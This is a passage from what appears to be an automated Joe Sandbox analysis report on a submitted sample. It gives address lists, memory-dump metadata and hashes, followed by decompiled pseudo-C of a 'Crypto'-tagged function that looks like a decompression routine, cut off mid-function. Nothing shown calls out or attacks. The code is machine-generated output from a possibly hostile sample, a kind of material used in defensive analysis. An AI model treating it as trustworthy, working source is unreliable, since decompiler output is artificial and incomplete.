                                                    0x00cd694a
                                                    0x00000000
                                                    0x00cd694a
                                                    0x00cd68ea
                                                    0x00cd68f0
                                                    0x00cd68f2
                                                    0x00cd68f7
                                                    0x00cd68f9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd68f9
                                                    0x00cd64a9
                                                    0x00cd64a9
                                                    0x00cd64af
                                                    0x00cd64b2
                                                    0x00cd64c8
                                                    0x00cd64cb
                                                    0x00cd64d1
                                                    0x00cd64d4
                                                    0x00cd64d6
                                                    0x00cd64da
                                                    0x00cd64df
                                                    0x00cd64e5
                                                    0x00cd64f0
                                                    0x00cd64f7
                                                    0x00cd64f9
                                                    0x00cd64f9
                                                    0x00cd64fc
                                                    0x00cd6500
                                                    0x00cd6503
                                                    0x00cd6503
                                                    0x00cd64b4
                                                    0x00cd64b4
                                                    0x00cd64b8
                                                    0x00cd64b8
                                                    0x00cd6508
                                                    0x00cd650f
                                                    0x00cd6515
                                                    0x00cd651b
                                                    0x00cd6522
                                                    0x00cd6561
                                                    0x00cd6563
                                                    0x00cd6564
                                                    0x00cd6565
                                                    0x00cd6567
                                                    0x00cd6583
                                                    0x00cd6586
                                                    0x00cd658a
                                                    0x00cd658d
                                                    0x00cd6593
                                                    0x00cd659d
                                                    0x00cd65a0
                                                    0x00cd65a6
                                                    0x00cd65a9
                                                    0x00cd65b6
                                                    0x00cd65b8
                                                    0x00cd65be
                                                    0x00cd65c0
                                                    0x00cd65c0
                                                    0x00cd65c2
                                                    0x00000000
                                                    0x00cd65c2
                                                    0x00cd6569
                                                    0x00cd656f
                                                    0x00cd6572
                                                    0x00cd6572
                                                    0x00cd6572
                                                    0x00cd6574
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6576
                                                    0x00cd6576
                                                    0x00cd6577
                                                    0x00cd657a
                                                    0x00cd657d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd657f
                                                    0x00000000
                                                    0x00cd657f
                                                    0x00cd6581
                                                    0x00cd6581
                                                    0x00000000
                                                    0x00cd6524
                                                    0x00cd6524
                                                    0x00cd6526
                                                    0x00cd6529
                                                    0x00cd652b
                                                    0x00cd6537
                                                    0x00cd653e
                                                    0x00cd6542
                                                    0x00cd6545
                                                    0x00cd6549
                                                    0x00cd6550
                                                    0x00cd6553
                                                    0x00cd6557
                                                    0x00cd65ca
                                                    0x00cd65ca
                                                    0x00cd65cd
                                                    0x00cd65d0
                                                    0x00cd65da
                                                    0x00cd65e4
                                                    0x00cd65e9
                                                    0x00cd65ea
                                                    0x00cd65ee
                                                    0x00cd65f0
                                                    0x00cd65f4
                                                    0x00cd65f6
                                                    0x00cd6744
                                                    0x00cd6744
                                                    0x00cd6747
                                                    0x00cd6747
                                                    0x00cd674d
                                                    0x00cd674f
                                                    0x00cd6750
                                                    0x00cd6756
                                                    0x00cd6758
                                                    0x00cd6759
                                                    0x00cd675f
                                                    0x00cd6761
                                                    0x00cd6761
                                                    0x00cd6761
                                                    0x00cd675f
                                                    0x00cd6756
                                                    0x00cd6765
                                                    0x00cd676b
                                                    0x00cd6771
                                                    0x00cd6774
                                                    0x00cd6777
                                                    0x00cd677e
                                                    0x00cd6781
                                                    0x00cd679f
                                                    0x00cd679f
                                                    0x00cd67aa
                                                    0x00cd67ac
                                                    0x00cd67b1
                                                    0x00cd67b5
                                                    0x00cd67b7
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd67bd
                                                    0x00cd67bd
                                                    0x00cd67bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd67c5
                                                    0x00cd67c5
                                                    0x00cd67cd
                                                    0x00cd67d0
                                                    0x00cd67d6
                                                    0x00cd67d7
                                                    0x00cd67da
                                                    0x00cd67dc
                                                    0x00cd67de
                                                    0x00cd6856
                                                    0x00cd6856
                                                    0x00cd6858
                                                    0x00cd685c
                                                    0x00cd685f
                                                    0x00cd6862
                                                    0x00cd6867
                                                    0x00cd686a
                                                    0x00cd686d
                                                    0x00cd6872
                                                    0x00cd6875
                                                    0x00cd6878
                                                    0x00cd687d
                                                    0x00cd6880
                                                    0x00cd6883
                                                    0x00cd6888
                                                    0x00cd688b
                                                    0x00cd688e
                                                    0x00cd6893
                                                    0x00cd6896
                                                    0x00cd6899
                                                    0x00cd689e
                                                    0x00cd689e
                                                    0x00cd6899
                                                    0x00cd688e
                                                    0x00cd6883
                                                    0x00cd6878
                                                    0x00cd686d
                                                    0x00cd6862
                                                    0x00000000
                                                    0x00cd6858
                                                    0x00cd67e0
                                                    0x00cd67e0
                                                    0x00cd67e4
                                                    0x00cd682a
                                                    0x00cd682c
                                                    0x00cd682c
                                                    0x00cd682f
                                                    0x00cd6833
                                                    0x00cd6835
                                                    0x00cd6835
                                                    0x00cd6838
                                                    0x00cd683d
                                                    0x00cd6842
                                                    0x00cd6843
                                                    0x00cd6845
                                                    0x00cd6847
                                                    0x00cd6849
                                                    0x00cd6849
                                                    0x00cd6849
                                                    0x00cd684e
                                                    0x00cd6852
                                                    0x00000000
                                                    0x00cd6852
                                                    0x00cd67e6
                                                    0x00cd67e8
                                                    0x00cd67e8
                                                    0x00cd67eb
                                                    0x00cd67eb
                                                    0x00cd67ed
                                                    0x00cd67ef
                                                    0x00cd67f5
                                                    0x00cd67fb
                                                    0x00cd6801
                                                    0x00cd6807
                                                    0x00cd680d
                                                    0x00cd6813
                                                    0x00cd6816
                                                    0x00cd6819
                                                    0x00cd681b
                                                    0x00cd681e
                                                    0x00cd6820
                                                    0x00cd6820
                                                    0x00cd6820
                                                    0x00cd6825
                                                    0x00000000
                                                    0x00cd6783
                                                    0x00cd6783
                                                    0x00cd6783
                                                    0x00cd678c
                                                    0x00cd678d
                                                    0x00000000
                                                    0x00cd678d
                                                    0x00cd6781
                                                    0x00cd65fc
                                                    0x00cd65fc
                                                    0x00cd65ff
                                                    0x00cd670e
                                                    0x00cd6711
                                                    0x00cd671a
                                                    0x00cd6723
                                                    0x00cd6727
                                                    0x00cd672b
                                                    0x00cd6732
                                                    0x00cd673c
                                                    0x00cd673f
                                                    0x00000000
                                                    0x00cd673f
                                                    0x00cd6605
                                                    0x00cd6605
                                                    0x00cd6649
                                                    0x00cd6607
                                                    0x00cd660a
                                                    0x00cd6617
                                                    0x00cd6626
                                                    0x00cd662a
                                                    0x00cd662e
                                                    0x00cd6634
                                                    0x00cd6636
                                                    0x00cd6639
                                                    0x00cd663d
                                                    0x00cd6640
                                                    0x00cd6644
                                                    0x00cd6644
                                                    0x00cd664e
                                                    0x00cd6655
                                                    0x00cd665b
                                                    0x00cd6661
                                                    0x00cd6668
                                                    0x00cd6699
                                                    0x00cd669b
                                                    0x00cd669c
                                                    0x00cd669d
                                                    0x00cd66a1
                                                    0x00cd66a3
                                                    0x00cd66c1
                                                    0x00cd66c4
                                                    0x00cd66d0
                                                    0x00cd66d3
                                                    0x00cd66d7
                                                    0x00cd66dc
                                                    0x00cd66ef
                                                    0x00cd66f1
                                                    0x00cd66f7
                                                    0x00cd66f9
                                                    0x00cd66f9
                                                    0x00cd66fb
                                                    0x00000000
                                                    0x00cd66fb
                                                    0x00cd66a5
                                                    0x00cd66ab
                                                    0x00cd66ae
                                                    0x00cd66ae
                                                    0x00cd66ae
                                                    0x00cd66b0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd66b2
                                                    0x00cd66b2
                                                    0x00cd66b3
                                                    0x00cd66b6
                                                    0x00cd66b9
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd66bb
                                                    0x00000000
                                                    0x00cd66bb
                                                    0x00cd66bd
                                                    0x00cd66bd
                                                    0x00000000
                                                    0x00cd666a
                                                    0x00cd666a
                                                    0x00cd666c
                                                    0x00cd666f
                                                    0x00cd6679
                                                    0x00cd6689
                                                    0x00cd668c
                                                    0x00cd668f
                                                    0x00cd6703
                                                    0x00cd6706
                                                    0x00cd6706
                                                    0x00cd6708
                                                    0x00cd6708
                                                    0x00000000
                                                    0x00cd6708
                                                    0x00cd6668
                                                    0x00cd65d2
                                                    0x00cd65d2
                                                    0x00000000
                                                    0x00cd65d2
                                                    0x00cd6522
                                                    0x00cd645f
                                                    0x00cd645f
                                                    0x00cd6466
                                                    0x00cd6490
                                                    0x00cd6493
                                                    0x00cd6496
                                                    0x00000000
                                                    0x00cd6468
                                                    0x00cd6475
                                                    0x00cd6480
                                                    0x00000000
                                                    0x00cd6480
                                                    0x00cd6466
                                                    0x00cd63ba
                                                    0x00cd635f
                                                    0x00cd635f
                                                    0x00cd6362
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd6364
                                                    0x00cd6366
                                                    0x00cd636b
                                                    0x00cd6371
                                                    0x00cd6377
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd637d
                                                    0x00cd637d
                                                    0x00cd6391
                                                    0x00cd6391
                                                    0x00cd6398
                                                    0x00cd6cd0
                                                    0x00cd6cd0
                                                    0x00000000
                                                    0x00cd6cd0
                                                    0x00000000
                                                    0x00cd6398
                                                    0x00cd637f
                                                    0x00cd637f
                                                    0x00cd6385
                                                    0x00cd638b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd638b
                                                    0x00cd62cd

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                    • Instruction ID: 4800f88b1e86e75450f3dcfaaf6479dd8a6896d350295f639f1d86295592b76c
                                                    • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                    • Instruction Fuzzy Hash: 8062D8716047849FCB25CF38C8906B9BBE1AF95304F08896FD9EA8B346D734EA45DB11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD77EF Relevance: .8, Instructions: 817COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E00CD77EF(signed int __ecx) {
				signed int _t363;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				void* _t385;
				signed int _t388;
				signed int _t389;
				intOrPtr _t391;
				signed int _t401;
				char _t410;
				unsigned int _t411;
				void* _t421;
				signed int _t422;
				signed int _t423;
				intOrPtr _t425;
				signed int _t428;
				char _t437;
				signed int _t439;
				signed int _t441;
				signed int _t444;
				signed int* _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t457;
				void* _t462;
				signed int _t463;
				signed int _t464;
				intOrPtr _t466;
				signed int _t469;
				char _t478;
				unsigned int _t479;
				signed int* _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t491;
				signed int _t492;
				signed short _t493;
				unsigned int _t499;
				signed int _t500;
				signed int* _t506;
				unsigned int _t507;
				intOrPtr _t520;
				intOrPtr* _t521;
				intOrPtr _t523;
				signed int* _t524;
				signed int _t525;
				intOrPtr _t526;
				signed int _t528;
				void* _t529;
				signed int _t532;
				signed int* _t534;
				unsigned int _t537;
				signed int _t538;
				void* _t539;
				signed int _t542;
				signed int _t544;
				signed int _t547;
				void* _t549;
				unsigned int _t552;
				signed int _t553;
				intOrPtr* _t555;
				void* _t556;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t564;
				signed int* _t569;
				void* _t570;
				signed int _t573;
				signed int _t575;
				signed int _t577;
				signed int _t580;
				void* _t582;
				unsigned int _t585;
				signed int _t586;
				signed int _t588;
				signed int _t590;
				void* _t592;
				signed int _t595;
				intOrPtr* _t597;
				void* _t598;
				signed int _t601;
				void* _t604;
				signed int _t607;
				signed int _t608;
				intOrPtr* _t610;
				void* _t611;
				signed int _t614;
				signed int _t615;
				void* _t617;
				signed int _t620;
				intOrPtr* _t623;
				void* _t624;
				signed int _t628;
				unsigned int _t630;
				signed int _t633;
				signed int _t634;
				signed int _t635;
				unsigned int _t637;
				signed int _t640;
				void* _t643;
				signed int* _t644;
				signed int _t645;
				signed int _t646;
				void* _t649;
				unsigned int _t651;
				signed int _t654;
				signed int _t658;
				void* _t661;
				signed int* _t662;
				unsigned int _t664;
				signed int _t667;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				intOrPtr* _t672;
				signed int _t673;
				signed int* _t674;
				signed int _t676;
				signed int _t677;
				unsigned int _t681;
				signed int _t682;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int* _t690;
				signed int* _t691;
				signed int* _t692;
				signed int _t694;
				unsigned int _t696;
				signed int _t697;
				signed int _t698;
				signed int* _t699;
				signed int _t702;
				signed int _t704;
				signed int _t705;
				signed int _t707;
				signed int _t709;
				char* _t710;
				signed int _t711;
				unsigned int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t723;
				signed int _t724;
				void* _t725;

				_t520 =  *((intOrPtr*)(_t725 + 0x40));
				_t686 = __ecx;
				_t692 = _t520 + 4;
				 *(_t725 + 0x24) = __ecx;
				_t672 = _t520 + 0x18;
				 *(_t725 + 0x10) = _t692;
				if( *((char*)(_t520 + 0x2c)) != 0) {
					 *(_t725 + 0x10) = _t692;
					L4:
					_t523 =  *_t672;
					if( *_t692 <=  *((intOrPtr*)(_t520 + 0x24)) + _t523) {
						_t363 =  *((intOrPtr*)(_t520 + 0x20)) - 1 + _t523;
						_t694 =  *((intOrPtr*)(_t520 + 0x4acc)) - 0x10;
						 *(_t725 + 0x18) = _t363;
						 *(_t725 + 0x14) = _t694;
						 *(_t725 + 0x2c) = _t363;
						__eflags = _t363 - _t694;
						if(_t363 >= _t694) {
							 *(_t725 + 0x2c) = _t694;
						}
						_t524 =  *(_t725 + 0x10);
						while(1) {
							_t673 =  *(_t686 + 0xe6dc);
							_t628 =  *(_t686 + 0x7c) & _t673;
							 *(_t686 + 0x7c) = _t628;
							_t525 =  *_t524;
							__eflags = _t525 -  *(_t725 + 0x2c);
							if(_t525 <  *(_t725 + 0x2c)) {
								goto L19;
							}
							L13:
							__eflags = _t525 - _t363;
							if(__eflags > 0) {
								L145:
								return 1;
							}
							if(__eflags != 0) {
								L16:
								__eflags = _t525 - _t705;
								if(_t525 < _t705) {
									L18:
									__eflags = _t525 -  *((intOrPtr*)(_t520 + 0x4acc));
									if(_t525 >=  *((intOrPtr*)(_t520 + 0x4acc))) {
										L144:
										 *((char*)(_t520 + 0x4ad3)) = 1;
										goto L145;
									}
									goto L19;
								}
								__eflags =  *((char*)(_t520 + 0x4ad2));
								if( *((char*)(_t520 + 0x4ad2)) == 0) {
									goto L144;
								}
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t520 + 8)) -  *((intOrPtr*)(_t520 + 0x1c));
							if( *((intOrPtr*)(_t520 + 8)) >=  *((intOrPtr*)(_t520 + 0x1c))) {
								goto L145;
							}
							goto L16;
							L19:
							_t526 =  *((intOrPtr*)(_t686 + 0x4b3c));
							__eflags = (_t526 - _t628 & _t673) - 0x1004;
							if((_t526 - _t628 & _t673) >= 0x1004) {
								L24:
								_t674 =  *(_t725 + 0x10);
								_t367 = E00CCA89D(_t674);
								_t368 =  *(_t520 + 0xb4);
								_t630 = _t367 & 0x0000fffe;
								__eflags = _t630 -  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4));
								if(_t630 >=  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4))) {
									_t528 = 0xf;
									_t369 = _t368 + 1;
									 *(_t725 + 0x28) = _t528;
									__eflags = _t369 - _t528;
									if(_t369 >= _t528) {
										L32:
										_t696 = _t674[1] + _t528;
										_t697 = _t696 & 0x00000007;
										 *_t674 =  *_t674 + (_t696 >> 3);
										 *(_t725 + 0x1c) =  *_t674;
										_t373 =  *(_t725 + 0x28);
										_t674[1] = _t697;
										_t529 = 0x10;
										_t532 =  *((intOrPtr*)(_t520 + 0x74 + _t373 * 4)) + (_t630 -  *((intOrPtr*)(_t520 + 0x30 + _t373 * 4)) >> _t529 - _t373);
										__eflags = _t532 -  *((intOrPtr*)(_t520 + 0x30));
										asm("sbb eax, eax");
										_t374 = _t373 & _t532;
										__eflags = _t374;
										_t524 =  *(_t725 + 0x10);
										_t633 =  *(_t520 + 0xcb8 + _t374 * 2) & 0x0000ffff;
										_t375 =  *(_t725 + 0x1c);
										L33:
										_t634 = _t633 & 0x0000ffff;
										__eflags = _t634 - 0x100;
										if(_t634 >= 0x100) {
											__eflags = _t634 - 0x106;
											if(_t634 < 0x106) {
												__eflags = _t634 - 0x100;
												if(_t634 != 0x100) {
													__eflags = _t634 - 0x101;
													if(_t634 != 0x101) {
														_t635 = _t634 + 0xfffffefe;
														__eflags = _t635;
														_t534 = _t686 + (_t635 + 0x18) * 4;
														_t698 =  *_t534;
														 *(_t725 + 0x28) = _t698;
														if(_t635 == 0) {
															L117:
															 *(_t686 + 0x60) = _t698;
															_t699 =  *(_t725 + 0x10);
															_t376 = E00CCA89D(_t699);
															_t377 =  *(_t520 + 0x2d78);
															_t637 = _t376 & 0x0000fffe;
															__eflags = _t637 -  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4));
															if(_t637 >=  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4))) {
																_t676 = 0xf;
																_t378 = _t377 + 1;
																__eflags = _t378 - _t676;
																if(_t378 >= _t676) {
																	L125:
																	_t537 = _t699[1] + _t676;
																	_t538 = _t537 & 0x00000007;
																	_t699[1] = _t538;
																	 *_t699 =  *_t699 + (_t537 >> 3);
																	_t381 =  *_t699;
																	 *(_t725 + 0x34) = _t538;
																	_t539 = 0x10;
																	 *(_t725 + 0x30) = _t381;
																	_t542 =  *((intOrPtr*)(_t520 + 0x2d38 + _t676 * 4)) + (_t637 -  *((intOrPtr*)(_t520 + 0x2cf4 + _t676 * 4)) >> _t539 - _t676);
																	__eflags = _t542 -  *((intOrPtr*)(_t520 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t382 = _t381 & _t542;
																	__eflags = _t382;
																	_t383 =  *(_t520 + 0x397c + _t382 * 2) & 0x0000ffff;
																	L126:
																	_t677 = _t383 & 0x0000ffff;
																	__eflags = _t677 - 8;
																	if(_t677 >= 8) {
																		_t702 = (_t677 >> 2) - 1;
																		_t681 = ((_t677 & 0x00000003 | 0x00000004) << _t702) + 2;
																		__eflags = _t702;
																		if(_t702 != 0) {
																			_t411 = E00CCA89D( *(_t725 + 0x10));
																			_t644 =  *(_t725 + 0x10);
																			_t549 = 0x10;
																			_t681 = _t681 + (_t411 >> _t549 - _t702);
																			_t552 =  *(_t725 + 0x34) + _t702;
																			_t553 = _t552 & 0x00000007;
																			__eflags = _t553;
																			 *_t644 = (_t552 >> 3) +  *(_t725 + 0x30);
																			_t644[1] = _t553;
																		}
																	} else {
																		_t681 = _t677 + 2;
																	}
																	_t640 =  *(_t686 + 0x7c);
																	_t544 =  *(_t725 + 0x28);
																	_t385 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																	_t704 = _t640 - _t544;
																	 *(_t686 + 0x74) = _t681;
																	__eflags = _t704 - _t385;
																	if(_t704 >= _t385) {
																		L140:
																		_t524 =  *(_t725 + 0x10);
																		_t363 =  *(_t725 + 0x18);
																		__eflags = _t681;
																		if(_t681 == 0) {
																			goto L11;
																		}
																		_t388 =  *(_t686 + 0xe6dc);
																		do {
																			_t389 = _t388 & _t704;
																			_t704 = _t704 + 1;
																			 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t640)) =  *((intOrPtr*)(_t389 +  *((intOrPtr*)(_t686 + 0x4b40))));
																			_t388 =  *(_t686 + 0xe6dc);
																			_t640 =  *(_t686 + 0x7c) + 0x00000001 & _t388;
																			 *(_t686 + 0x7c) = _t640;
																			_t681 = _t681 - 1;
																			__eflags = _t681;
																		} while (_t681 != 0);
																		goto L35;
																	} else {
																		__eflags = _t640 - _t385;
																		if(_t640 >= _t385) {
																			goto L140;
																		}
																		_t391 =  *((intOrPtr*)(_t686 + 0x4b40));
																		_t521 = _t391 + _t704;
																		_t710 = _t391 + _t640;
																		_t643 = 8;
																		 *(_t686 + 0x7c) = _t640 + _t681;
																		__eflags = _t681 - _t643;
																		if(_t681 < _t643) {
																			L84:
																			_t363 =  *(_t725 + 0x18);
																			_t524 =  *(_t725 + 0x10);
																			__eflags = _t681;
																			if(_t681 == 0) {
																				L10:
																				_t520 =  *((intOrPtr*)(_t725 + 0x4c));
																				L11:
																				_t705 =  *(_t725 + 0x14);
																				continue;
																				do {
																					do {
																						_t673 =  *(_t686 + 0xe6dc);
																						_t628 =  *(_t686 + 0x7c) & _t673;
																						 *(_t686 + 0x7c) = _t628;
																						_t525 =  *_t524;
																						__eflags = _t525 -  *(_t725 + 0x2c);
																						if(_t525 <  *(_t725 + 0x2c)) {
																							goto L19;
																						}
																						goto L13;
																					} while (_t681 == 0);
																					_t646 =  *(_t686 + 0x7c);
																					_t561 =  *(_t686 + 0x60);
																					_t421 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																					_t709 = _t646 - _t561;
																					__eflags = _t709 - _t421;
																					if(_t709 >= _t421) {
																						L112:
																						_t422 =  *(_t686 + 0xe6dc);
																						do {
																							_t423 = _t422 & _t709;
																							_t709 = _t709 + 1;
																							 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t423 +  *((intOrPtr*)(_t686 + 0x4b40))));
																							_t422 =  *(_t686 + 0xe6dc);
																							_t646 =  *(_t686 + 0x7c) + 0x00000001 & _t422;
																							 *(_t686 + 0x7c) = _t646;
																							_t681 = _t681 - 1;
																							__eflags = _t681;
																						} while (_t681 != 0);
																						L35:
																						_t524 =  *(_t725 + 0x10);
																						_t363 =  *(_t725 + 0x18);
																						goto L11;
																					}
																					__eflags = _t646 - _t421;
																					if(_t646 >= _t421) {
																						goto L112;
																					}
																					_t425 =  *((intOrPtr*)(_t686 + 0x4b40));
																					_t521 = _t425 + _t709;
																					_t710 = _t425 + _t646;
																					_t649 = 8;
																					 *(_t686 + 0x7c) = _t646 + _t681;
																					__eflags = _t681 - _t649;
																					if(_t681 < _t649) {
																						goto L84;
																					}
																					__eflags = _t561 - _t681;
																					if(_t561 >= _t681) {
																						_t428 = _t681 >> 3;
																						__eflags = _t428;
																						 *(_t725 + 0x34) = _t428;
																						_t688 = _t428;
																						do {
																							E00CE0320(_t710, _t521, _t649);
																							_t725 = _t725 + 0xc;
																							_t649 = 8;
																							_t521 = _t521 + _t649;
																							_t710 = _t710 + _t649;
																							_t681 = _t681 - _t649;
																							_t688 = _t688 - 1;
																							__eflags = _t688;
																						} while (_t688 != 0);
																						L83:
																						_t686 =  *(_t725 + 0x24);
																						goto L84;
																					}
																					_t564 = _t681 >> 3;
																					__eflags = _t564;
																					do {
																						_t681 = _t681 - _t649;
																						 *_t710 =  *_t521;
																						 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																						 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																						 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																						 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																						 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																						 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																						_t437 =  *((intOrPtr*)(_t521 + 7));
																						_t521 = _t521 + _t649;
																						 *((char*)(_t710 + 7)) = _t437;
																						_t710 = _t710 + _t649;
																						_t564 = _t564 - 1;
																						__eflags = _t564;
																					} while (_t564 != 0);
																					goto L84;
																					L92:
																					_t524 =  *(_t725 + 0x10);
																					_t705 =  *(_t725 + 0x14);
																					_t363 =  *(_t725 + 0x18);
																					__eflags = _t681;
																				} while (_t681 == 0);
																				_t463 =  *(_t686 + 0xe6dc);
																				_t716 =  *(_t725 + 0x34);
																				do {
																					_t464 = _t463 & _t716;
																					_t716 = _t716 + 1;
																					 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t658)) =  *((intOrPtr*)(_t464 +  *((intOrPtr*)(_t686 + 0x4b40))));
																					_t463 =  *(_t686 + 0xe6dc);
																					_t658 =  *(_t686 + 0x7c) + 0x00000001 & _t463;
																					 *(_t686 + 0x7c) = _t658;
																					_t681 = _t681 - 1;
																					__eflags = _t681;
																				} while (_t681 != 0);
																				goto L35;
																			}
																			 *_t710 =  *_t521;
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 1;
																			if(_t681 <= 1) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 2;
																			if(_t681 <= 2) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 3;
																			if(_t681 <= 3) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 4;
																			if(_t681 <= 4) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 5;
																			if(_t681 <= 5) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 6;
																			if(_t681 <= 6) {
																				goto L10;
																			}
																			_t520 =  *((intOrPtr*)(_t725 + 0x4c));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			goto L35;
																		}
																		__eflags = _t544 - _t681;
																		if(_t544 >= _t681) {
																			_t401 = _t681 >> 3;
																			__eflags = _t401;
																			 *(_t725 + 0x34) = _t401;
																			_t687 = _t401;
																			do {
																				E00CE0320(_t710, _t521, _t643);
																				_t725 = _t725 + 0xc;
																				_t643 = 8;
																				_t521 = _t521 + _t643;
																				_t710 = _t710 + _t643;
																				_t681 = _t681 - _t643;
																				_t687 = _t687 - 1;
																				__eflags = _t687;
																			} while (_t687 != 0);
																			goto L83;
																		}
																		_t547 = _t681 >> 3;
																		__eflags = _t547;
																		do {
																			_t681 = _t681 - _t643;
																			 *_t710 =  *_t521;
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			_t410 =  *((intOrPtr*)(_t521 + 7));
																			_t521 = _t521 + _t643;
																			 *((char*)(_t710 + 7)) = _t410;
																			_t710 = _t710 + _t643;
																			_t547 = _t547 - 1;
																			__eflags = _t547;
																		} while (_t547 != 0);
																		goto L84;
																	}
																}
																_t555 = _t520 + (_t378 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t637 -  *_t555;
																	if(_t637 <  *_t555) {
																		break;
																	}
																	_t378 = _t378 + 1;
																	_t555 = _t555 + 4;
																	__eflags = _t378 - 0xf;
																	if(_t378 < 0xf) {
																		continue;
																	}
																	goto L125;
																}
																_t676 = _t378;
																goto L125;
															}
															_t556 = 0x10;
															_t645 = _t637 >> _t556 - _t377;
															_t559 = ( *(_t645 + _t520 + 0x2d7c) & 0x000000ff) + _t699[1];
															 *_t699 =  *_t699 + (_t559 >> 3);
															_t560 = _t559 & 0x00000007;
															 *(_t725 + 0x30) =  *_t699;
															_t699[1] = _t560;
															_t383 =  *(_t520 + 0x317c + _t645 * 2) & 0x0000ffff;
															 *(_t725 + 0x34) = _t560;
															goto L126;
														} else {
															goto L116;
														}
														do {
															L116:
															 *_t534 =  *(_t534 - 4);
															_t534 = _t534 - 4;
															_t635 = _t635 - 1;
															__eflags = _t635;
														} while (_t635 != 0);
														goto L117;
													}
													_t681 =  *(_t686 + 0x74);
													_t705 =  *(_t725 + 0x14);
													_t363 =  *(_t725 + 0x18);
													__eflags = _t681;
												}
												_push(_t725 + 0x38);
												_t439 = E00CD3F9D(_t686, _t524);
												__eflags = _t439;
												if(_t439 == 0) {
													goto L145;
												}
												_t441 = E00CD253E(_t686, _t725 + 0x38);
												__eflags = _t441;
												if(_t441 == 0) {
													goto L145;
												}
												goto L35;
											}
											_t682 = _t634 - 0x106;
											__eflags = _t682 - 8;
											if(_t682 >= 8) {
